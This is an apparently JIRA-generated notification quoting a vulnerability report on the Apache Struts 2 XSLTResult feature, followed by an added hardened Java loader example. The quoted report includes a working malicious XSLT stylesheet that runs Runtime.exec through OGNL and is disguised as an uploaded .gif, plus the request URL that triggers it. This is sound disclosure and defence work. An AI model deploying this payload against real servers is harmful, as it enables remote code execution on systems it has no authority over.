[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235302#comment-13235302 ]
zhouyanming commented on WW-3782:
---------------------------------

Bro, this is hilarious; the Celestial Empire hasn't taken over the whole world yet.

> Struts2 framework XSLTResult local file code execution vulnerability
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> Struts2 allows an action to have several result types, including the XSLT type. This type accepts a file path submitted by the user and parses it as an XSLT file, whatever its extension is.
> This is the code of the XSLTResult file:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
>
> // get the value of the user-submitted "xslt.location" parameter
> String pathFromRequest =
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> // parse the user-submitted file path as XSLT
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
>
> XSLT parsing, however, allows Java static methods to be executed, so it is enough to upload a file to the server, for example
> /upload/7758521.gif
>
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of
> select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
>
> When this xsl file is parsed, it calls
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> in OGNL, which leads to arbitrary code execution.
> Suppose the address of an action with an XSLT result is
>
> http://www.inbreak.net/xslt.action
>
> We can then submit
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> and it becomes
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

--
This message is automatically generated by JIRA.
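As an added example (not Struts code and not part of the issue above), a hardened stylesheet loader in plain JAXP that removes the two conditions the report depends on: the stylesheet path comes from configuration rather than from the request parameter, and the TransformerFactory runs with secure processing so that extension functions such as the ognl: namespace binding are refused. The class name, the root directory and the name pattern are assumptions.

```java
import java.io.IOException;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamSource;

/** Hypothetical hardened loader; illustrative, not Struts code. */
public final class SafeXsltLoader {

    // Assumption: stylesheets live only under this application-controlled directory.
    private final Path stylesheetRoot;

    public SafeXsltLoader(Path stylesheetRoot) {
        this.stylesheetRoot = stylesheetRoot.toAbsolutePath().normalize();
    }

    /**
     * name comes from the action configuration (e.g. struts.xml), never from a
     * request parameter such as xslt.location. Anything outside the allowed set throws.
     */
    public Templates load(String name) throws IOException, TransformerConfigurationException {
        // 1. Accept only a bare file name with the .xsl extension: no separators, no traversal.
        if (!name.matches("[A-Za-z0-9_-]+\\.xsl")) {
            throw new IllegalArgumentException("stylesheet name not allowed: " + name);
        }
        // 2. Resolve and confirm the canonical path is still inside the root (no symlink escape).
        Path resolved = stylesheetRoot.resolve(name).toRealPath();
        if (!resolved.startsWith(stylesheetRoot.toRealPath())) {
            throw new IOException("stylesheet escapes root: " + resolved);
        }
        // 3. Secure processing makes the JDK/Xalan processor reject extension functions,
        //    which is the mechanism the ognl:getValue(...) call in the report relies on.
        TransformerFactory factory = TransformerFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // 4. Block external DTDs and remote xsl:import / xsl:include (JAXP 1.5 attributes).
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return factory.newTemplates(new StreamSource(resolved.toFile()));
    }
}
```

With secure processing enabled, a stylesheet like the one in the report fails at compile time with an error that extension functions are not allowed, instead of executing the expression.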